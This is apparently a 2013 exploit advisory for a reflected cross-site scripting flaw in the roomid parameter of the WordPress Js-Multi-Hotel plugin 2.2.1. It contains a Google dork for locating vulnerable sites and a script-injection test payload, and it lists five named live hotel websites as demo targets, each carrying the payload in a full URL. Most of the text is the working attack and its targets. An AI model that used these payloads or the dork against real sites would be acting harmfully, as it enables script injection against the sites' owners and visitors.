#######################################################################
# Exploit Title : Wordpress Js-Multi-Hotel Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content//plugins/js-multihotel/
#
# Date: 2013-11-30
#
# Vendor Homepage : http://wordpress.org
#
# Plugin Name : Js Multi Hotel
#
# Version : 2.2.1
#
# Tested on: Windows , Linux
#
##############
# Exploit : Cross site scripting
#
# Location:
wp-content//plugins/js-multihotel/includes/refreshDate.php?d=&roomid=[xss]
#
# Metod : Get
#
# Scrpt For Test : "/><script>alert(1);</script>
#
##############
##############
# Demo:
#
#
http://addocreations.com/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
#
#
http://broadwaysbnb.com/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
#
#
http://hotelpachelly.com/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
#
#
http://rajasthan-hotels.in/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
#
#
http://palenque.piedradeagua.com/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
##############
#
# Discovered By : ACC3SS
#
##############